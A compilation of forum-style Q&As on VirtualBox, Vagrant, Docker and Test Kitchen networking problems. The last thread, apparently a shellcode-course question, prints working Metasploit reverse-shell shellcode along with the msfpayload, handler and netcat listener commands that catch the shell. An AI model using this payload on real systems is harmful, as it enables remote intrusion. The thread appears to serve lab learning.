Can't reach Vagrant box over private network - macOS

My Vagrant box stopped working for an unknown reason, and even after I reinstall the whole box through my Ansible script, it can't be reached at http://192.168.33.10/.
Here is my Vagrantfile:
Vagrant.configure(2) do |config|
  config.vm.box = "centos67vm"
  config.vm.synced_folder "../../pjt", "/var/www/pjt", owner: "pjt", group: "pjt", mount_options: ["dmode=777,fmode=777"]
  config.vm.synced_folder "../../library", "/var/library"
  config.vm.network :private_network, ip: "192.168.33.10"
  config.vm.provision :shell, path: "ansible.sh"
  config.vm.provider :virtualbox do |vb|
    vb.name = "dev-pjt"
  end
end
When I ping the IP I get:
ping 192.168.33.10
PING 192.168.33.10 (192.168.33.10): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
Request timeout for icmp_seq 3
Request timeout for icmp_seq 4
^C
--- 192.168.33.10 ping statistics ---
6 packets transmitted, 0 packets received, 100.0% packet loss
Running ifconfig inside the box gives me this:
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:1B:2F:CC
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe1b:2fcc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:967 errors:0 dropped:0 overruns:0 frame:0
TX packets:635 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:100532 (98.1 KiB) TX bytes:85600 (83.5 KiB)
eth1 Link encap:Ethernet HWaddr 08:00:27:2A:FE:79
inet addr:192.168.33.10 Bcast:192.168.33.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe2a:fe79/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:27 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:1974 (1.9 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
I don't know where I need to dig to find a solution (my Mac or VirtualBox?). I hope somebody can help me.

I finally resolved the problem, but I'm not sure exactly how, so here are the steps I took:
sudo route -n flush
rebooted the MacBook
deactivated Little Snitch and the NOD32 antivirus
vagrant up
successfully pinged and reached http://192.168.33.10/
vagrant halt
reactivated Little Snitch and the NOD32 antivirus
vagrant up
successfully pinged and reached http://192.168.33.10/
I don't know if it was the sudo route -n flush or the reboot that made the connection work again.
Hope it will help somebody ;)
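If anyone hits the same symptom, it may be worth checking the host side of the private network before rebooting. A small diagnostic sketch for the Mac; the vboxnet0 interface name is an assumption and may differ on your machine:
# List the host-only interfaces VirtualBox created for private networks
VBoxManage list hostonlyifs
# The host-side interface should hold an address in 192.168.33.0/24
ifconfig vboxnet0
# The Mac should have a route for the private subnet via that interface
netstat -rn | grep 192.168.33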

Related

VirtualBox - can't use internet in the terminal

I have Linux Mint in a VirtualBox VM and I'm able to use the Internet through the browser. However, when I try to use the command wget www.google.com, for example, the result is:
$ wget www.google.com
--2018-12-03 16:46:10-- http://www.google.com/
Resolving www.google.com (www.google.com)... 2800:3f0:4001:810::2004,
172.217.28.4
Connecting to www.google.com
(www.google.com)|2800:3f0:4001:810::2004|:80...
I've checked the issue "No internet in terminal", but unfortunately that one turned out to be a specific proxy problem, which is not my case.
My VM network config (the screenshot is in Portuguese, sorry!):
Basically, the connection type is set to "Bridged", and "promiscuous" mode is set to "Allow All".
There is no other adapter configured.
Result of the ifconfig command:
enp0s3 Link encap:Ethernet HWaddr 08:00:27:2b:04:c7
inet addr:192.168.0.39 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: 2804:14d:c092:4057:6d41:5685:4959:c973/64 Scope:Global
inet6 addr: 2804:14d:c092:4057::1005/128 Scope:Global
inet6 addr: fe80::da8c:1d0b:592d:5c90/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14289 errors:0 dropped:0 overruns:0 frame:0
TX packets:9307 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15589075 (15.5 MB) TX bytes:938043 (938.0 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:776 errors:0 dropped:0 overruns:0 frame:0
TX packets:776 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:66576 (66.5 KB) TX bytes:66576 (66.5 KB)
Linux Mint network config
Thanks to @darnir, I figured out a workaround for this problem! Basically, I had to add some aliases for wget and apt-get in my .bashrc file and edit /etc/sysctl.conf.
Aliases in ~/.bashrc:
# alias to force wget connections through IPv4
alias wget='wget -4 '
# alias to force apt-get connections through IPv4
alias apt-get='apt-get -o Acquire::ForceIPv4=true'
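After adding them, reload the shell configuration so the aliases take effect in the current session (assuming bash is the login shell):
source ~/.bashrc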
Edits to /etc/sysctl.conf (remember, this solution was implemented on the Linux Mint distro):
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
To reload sysctl with the new settings:
sudo sysctl -p
Or you can use -w with the sysctl command directly, but this config will be lost when the system reboots:
sysctl -w net.ipv6.conf.all.disable_ipv6=1
sysctl -w net.ipv6.conf.default.disable_ipv6=1
sysctl -w net.ipv6.conf.lo.disable_ipv6=1
WARNING: this is not a good solution because it is not comprehensive for the whole system. Apparently the problem is that IPv6 name resolution is just too slow to work properly in VMs (at least on common machines). If someone has another idea, please post it! :D
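For what it's worth, another workaround that is often suggested for slow IPv6 resolution is to make the resolver prefer IPv4 results without disabling IPv6 entirely, by adding (or uncommenting) one line in glibc's /etc/gai.conf. This is a hedged alternative, not part of the original answer:
# /etc/gai.conf - prefer IPv4 addresses returned by getaddrinfo()
precedence ::ffff:0:0/96 100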

HortonWorks Hadoop Sandbox and Tableau

I am attempting to connect Tableau to the HortonWorks Hadoop sandbox as described here: http://hortonworks.com/kb/how-to-connect-tableau-to-hortonworks-sandbox/
Tableau is able to see the virtual server as a data source, and it accurately lists the available Schemas and Tables.
However, when attempting to select any table or preview its data, it displays an error popup: 'An error has occurred while loading the data. No such table [default].[tablename]', where default is the schema and tablename is the name of the table I'm attempting to view.
Here is what comes back when I run ifconfig from the Terminal window in the VM sandbox. Tableau is connecting to the VM via 192.168.50.128.
eth3 Link encap:Ethernet HWaddr 00:0C:29:EB:B9:DC
inet addr:192.168.50.128 Bcast:192.168.50.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feeb:b9dc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:42011 errors:0 dropped:0 overruns:0 frame:0
TX packets:9750 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15123871 (14.4 MiB) TX bytes:4019795 (3.8 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5185579 errors:0 dropped:0 overruns:0 frame:0
TX packets:5185579 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2054785522 (1.9 GiB) TX bytes:2054785522 (1.9 GiB)
The guide states "Enter the IP address of the Sandbox VM (typically 192.168.56.101)", which is different.
Is this IP difference the source of the issue, or is there something else I've overlooked? I'm assuming that since it can see the schemas and tables, the IP wouldn't matter.
It turns out this was a permissions issue, which I was able to resolve by following this guide: http://diveintobigdata.blogspot.com/2015/10/error-occurred-executing-hive-query.html
However, everywhere the guide told me to enter localhost, such as when accessing Ambari, I had to replace localhost with 192.168.50.128, which, as mentioned above, is the IP I saw when executing ifconfig in the terminal.
Also, in step 1 of the guide there should not be any spaces in the file paths that are provided.

How to access a docker container running on MacOSX from another host?

I'm trying to get started with docker and want to run the Ubiquiti video controller. I have installed Docker Toolbox and managed to get the container to run on my Yosemite host and can access it on the same mac by going to the IP returned by docker-machine ip default. But I want to access it on other machines on the network and eventually set up port forwarding on my home router so I can access it outside my home network.
As suggested in boot2docker issue 160, using the VirtualBox GUI I was able to add a bridged network adapter, but after restarting the VM, docker-machine can no longer connect to it. docker-machine env default hangs for a long time but eventually returns some environment variables along with the message Maximum number of retries (60) exceeded. When I set up the shell with those variables and try to run docker ps, I get the error: An error occurred trying to connect: Get https://10.0.2.15:2376/v1.20/containers/json: dial tcp 10.0.2.15:2376: network is unreachable.
I suspect that docker-machine has some assumptions about networking configuration in the VM and I'm mucking them up.
docker-machine ssh ifconfig -a returns the following:
docker0 Link encap:Ethernet HWaddr 02:42:86:44:17:1E
inet addr:172.17.42.1 Bcast:0.0.0.0 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
dummy0 Link encap:Ethernet HWaddr 96:9F:AA:B8:BB:46
BROADCAST NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 Link encap:Ethernet HWaddr 08:00:27:37:2C:75
inet addr:192.168.1.142 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe37:2c75/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2996 errors:0 dropped:0 overruns:0 frame:0
TX packets:76 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:278781 (272.2 KiB) TX bytes:6824 (6.6 KiB)
Interrupt:17 Base address:0xd060
eth1 Link encap:Ethernet HWaddr 08:00:27:E8:38:7C
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee8:387c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:767 errors:0 dropped:0 overruns:0 frame:0
TX packets:495 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122291 (119.4 KiB) TX bytes:116118 (113.3 KiB)
eth2 Link encap:Ethernet HWaddr 08:00:27:A4:CF:12
inet addr:192.168.99.100 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fea4:cf12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:430 errors:0 dropped:0 overruns:0 frame:0
TX packets:322 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:53351 (52.1 KiB) TX bytes:24000 (23.4 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 seems to be getting a reasonable DHCP address from my router.
I'm not sure whether this is the right approach or whether I'm barking up the wrong tree. Even if I can get the bridged network adapter working on the VM, I don't know how to then convince my Docker container to use it. I've searched high and low on the internet and found dozens of sites that explain how you need to access the container using the value of docker-machine ip default rather than localhost, but nothing that explains how to access it from a different host. Maybe I need to improve my googling skills.
This worked for me (the equivalent VBoxManage commands are sketched after these steps):
with the VM stopped, add a 3rd "bridged" network adapter
start the VM with docker-machine start machine-name
regenerate the certs with docker-machine regenerate-certs machine-name
check that everything is OK with docker-machine ls
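A minimal command-line sketch of those steps, assuming the machine is named machine-name and picking the Mac's primary interface as the bridge target (both names are assumptions; check VBoxManage list bridgedifs for the exact adapter name on your system):
docker-machine stop machine-name
# Show the exact bridgeable interface names VirtualBox knows about
VBoxManage list bridgedifs
# Add a bridged NIC as adapter 3 (replace the interface name as needed)
VBoxManage modifyvm machine-name --nic3 bridged --bridgeadapter3 "en0: Wi-Fi (AirPort)"
docker-machine start machine-name
docker-machine regenerate-certs machine-name
docker-machine ls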
OK, so I found a better way to do it than trying to use a bridged network adapter. I found it in the boot2docker docs on port forwarding.
Just use VBoxManage modifyvm default --natpf1 "my_web,tcp,,8080,,80"
or use the VirtualBox GUI to specify your port forwarding for the NAT adapter.
Then remove the -p option from your docker run command and use --net=host instead. That is, instead of
docker run -d -p 8080:80 --name=web nginx
use
docker run -d --net=host --name=web nginx
And voila! Your web server is available at localhost:8080 on your host or YOURHOSTIP:8080 elsewhere on your LAN.
Note that using --net=host may mess up communication between containers on the VM, but since this is the only container I plan to run, it works great for me.
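As a side note (not part of the original answer): if you would rather keep the -p port mapping and container isolation, you can get the same reachability by forwarding a host port to the published port on the VM instead of using --net=host. A sketch, assuming the default machine and the same nginx image:
# With the VM stopped: forward Mac port 8080 to VM port 8080 over the NAT adapter
VBoxManage modifyvm default --natpf1 "my_web,tcp,,8080,,8080"
# Publish container port 80 on VM port 8080 as usual
docker run -d -p 8080:80 --name=web nginx
The -p flag binds the container's port on the VM, and the NAT rule then exposes that VM port on the Mac, so the service is again reachable at YOURHOSTIP:8080.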
On a machine with Docker Toolbox for Mac, I'm solving the problem as follows (using the default machine).
Preparation
Stop the machine if it's running:
docker-machine stop default
VirtualBox Setup
Open VirtualBox, select the default machine, open Settings (Cmd-S), go to Network, and select "Adapter 3".
Check "Enable Network Adapter" (turn it on).
Set "Attached to" to "Bridged Adapter".
Set Name to "en0: Ethernet" (or whatever the primary network interface of your Mac is).
Disclose "Advanced", and make sure "Cable Connected" is checked.
Note the "MAC Address" of "Adapter 3" (we'll use it later).
Press "OK" to save the settings.
Docker Setup
Now, back in Terminal, start the machine:
docker-machine start default
Just in case, regenerate the certs:
docker-machine regenerate-certs default
Update the environment:
eval $(docker-machine env default)
At this point, the machine should be running (with the default IP address of 192.168.99.100, accessible only from the hosting Mac). However, if you ssh into the docker VM (docker-machine ssh default) and run ifconfig -a, you'll see that one of the VM's interfaces (eth0 in my case) has an IP in the same network as your Mac (e.g. 192.168.0.102), which is accessible from other devices on your LAN.
Router Setup
Now, the last step is to make sure this address is fixed, and not changed from time to time by your router's DHCP. This may differ from router to router, the following applies to my no-frills TP-LINK router, but should be easily adjustable to other makes and models.
Open your router settings, and first check that default is in the router's DHCP Clients List, with the MAC address you noted in the VirtualBox setup above.
Open "DHCP" > "Address Reservation" in the router settings, and add the "Adapter 3" MAC Address (you may have to insert the missing dashes), and your desired IP there (e.g. 192.168.0.201).
Now my router asks me to reboot it. After the reboot, run docker-machine restart default for the Docker VM to pick up its new IP address.
Final verification: docker-machine ssh default, then ifconfig -a, and find your new IP address in the output (this time the interface was eth1).
Result
From the hosting Mac the machine is accessible via two addresses (192.168.99.100 and 192.168.0.201); from other devices in the LAN it's accessible as 192.168.0.201.
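A quick way to confirm the result from another device on the LAN (a hedged example; nginx and the port are only placeholders):
# On the Mac: run any container that publishes a port on the VM
docker run -d -p 80:80 --name=web nginx
# From another machine on the LAN
curl http://192.168.0.201/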
The main use case of this question is to access applications running in the container from the host (Mac) machine or from other machines on the host's (Mac's) network.
Once the container application has been started and exposed as below:
docker run -d -p 8080 <<image-name>>
then find the mapping between the host (Mac) port and the container port as below:
docker port <<container-name>>
Sample output: 8080/tcp -> 0.0.0.0:32771
Now access the container application as host(Mac IP):32771 from any machine on your host's (Mac's) network.
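If you only care about a single container port, docker port also accepts the port as an argument (same placeholder names as above):
docker port <<container-name>> 8080
# -> 0.0.0.0:32771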
If I change the first network card from NAT to bridged, I also can't connect to it.
What I found working was to add a 3rd network card, set it up in bridged mode, and change the adapter type to Intel PRO/1000 MT Desktop (82540EM). The default one is probably not supported by the boot2docker distro.
See my comment on GitHub.

Kitchen can't see the network configuration in the Vagrantfile

I am using Kitchen to test my cookbook and I added a network configuration to the Vagrantfile, but the Kitchen instance does not see this configuration.
This is my Vagrantfile configuration:
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
  config.vm.hostname = "demo-berkshelf"
  config.vm.box = "ubuntu-12.04"
  config.vm.network :private_network, ip: "33.33.33.10"
  config.berkshelf.enabled = true
  config.vm.provision :chef_solo do |chef|
    chef.json = {
      :mysql => {
        :server_root_password => 'rootpass',
        :server_debian_password => 'debpass',
        :server_repl_password => 'replpass'
      }
    }
    chef.run_list = [
      "recipe[demo::default]"
    ]
  end
end
And this is my .kitchen.yml configuration:
---
driver:
  name: vagrant
provisioner:
  name: chef_solo
platforms:
  - name: ubuntu-12.04
    driver_config:
      box: "ubuntu-12.04"
suites:
  - name: default
    run_list:
      - recipe[demo::default]
    attributes:
When I log in to the Kitchen instance, it shows me a network configuration that I don't expect:
roberto@rcisla-pc:~$ kitchen login default-ubuntu-1204
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
Welcome to your Vagrant-built virtual machine.
Last login: Wed Jan 22 14:02:59 2014 from 10.0.2.2
vagrant@default-ubuntu-1204:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:12:96:98
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe12:9698/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:360 errors:0 dropped:0 overruns:0 frame:0
TX packets:365 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:49328 (49.3 KB) TX bytes:42004 (42.0 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Where is the 33.33.33.10 address that I configured in the Vagrantfile?
Thanks in advance for any help.
Test Kitchen won't use your Vagrantfile by default; it generates its own based on the .kitchen.yml. See the README for instructions on how to configure networking through it. For example:
driver:
  name: vagrant
  network:
    - ["private_network", { ip: "192.168.33.10" }]
You can use a custom Vagrantfile template too, but normally it shouldn't be needed. See the default template for an example.
And finally, don't use 33.33.33.* addresses. That is a valid network owned by somebody. Use IPs from private networks like 10.0.0.0/8 or 192.168.0.0/16 instead. 192.168.33.* seems to be quite common with Vagrant.
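Applied to the .kitchen.yml from the question, the whole file would look roughly like this (a sketch, not tested against your cookbook):
---
driver:
  name: vagrant
  network:
    - ["private_network", { ip: "192.168.33.10" }]
provisioner:
  name: chef_solo
platforms:
  - name: ubuntu-12.04
    driver_config:
      box: "ubuntu-12.04"
suites:
  - name: default
    run_list:
      - recipe[demo::default]
    attributes: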

How to run the linux/x86/shell_reverse_tcp payload stand alone?

I'm trying to run the linux/x86/shell_reverse_tcp payload. If I look at the summary of the payload it seems like a host and port are the two requirements, shown below.
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload -p linux/x86/shell_reverse_tcp S
Name: Linux Command Shell, Reverse TCP Inline
Module: payload/linux/x86/shell_reverse_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 190
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Description:
Connect back to attacker and spawn a command shell
Because I'm running this on the local host, I used ifconfig to find my local IP address. It seems to be 10.0.1.38, shown below:
max@ubuntu-vm:~/SLAE/mod2$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:bf:ec:33
inet addr:10.0.1.38 Bcast:10.0.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:febf:ec33/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7866 errors:0 dropped:0 overruns:0 frame:0
TX packets:5066 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3043939 (3.0 MB) TX bytes:1149171 (1.1 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:310 errors:0 dropped:0 overruns:0 frame:0
TX packets:310 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:29143 (29.1 KB) TX bytes:29143 (29.1 KB)
So I use the msfpayload command to output the shellcode, put it in my shellcode sandbox, and compile:
max@ubuntu-vm:~/SLAE/mod2$ sudo msfpayload \
-p linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 C
/*
* linux/x86/shell_reverse_tcp - 68 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=10.0.1.38, LPORT=3333,
* ReverseConnectRetries=5, ReverseAllowProxy=false,
* PrependFork=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependSetresgid=false, PrependSetregid=false,
* PrependSetgid=false, PrependChrootBreak=false,
* AppendExit=false, InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
max@ubuntu-vm:~/SLAE/mod2$ gcc \
-fno-stack-protector -z execstack -o shellcode shellcode.c
So all seems well, except that when I try to run the payload I get a segmentation fault. So my question is: how would I run this payload successfully?
max@ubuntu-vm:~/SLAE/mod2$ ./shellcode
Shellcode Length: 26
Segmentation fault (core dumped)
max@ubuntu-vm:~/SLAE/mod2$
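(For context: the shellcode.c sandbox itself isn't shown above. A typical harness that produces this kind of output looks roughly like the sketch below; note that strlen stops at the first null byte in the buffer, which is why it reports 26 rather than 68.)
#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x00\x01\x26\x68"
"\x02\x00\x0d\x05\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Shellcode Length: %d\n", (int)strlen((char *)code));
    /* Cast the buffer to a function pointer and jump into it */
    int (*ret)(void) = (int (*)(void))code;
    ret();
    return 0;
}
It is compiled with -fno-stack-protector -z execstack as in the question.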
It's a reverse shell; it needs something to connect to.
You have to configure and start a reverse handler, something like this:
# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.0.1.38 LPORT=3333 E
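If you don't want to start Metasploit just to test the shellcode, a plain netcat listener on the LPORT should also catch the connect-back (a hedged alternative, not from the original answer; depending on your netcat flavor, nc -lv 3333 may be the correct invocation):
# Terminal 1: listen on the port the payload connects back to
nc -lvp 3333
# Terminal 2: run the compiled shellcode
./shellcode
When the payload connects, the nc session gives you the spawned /bin/sh.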
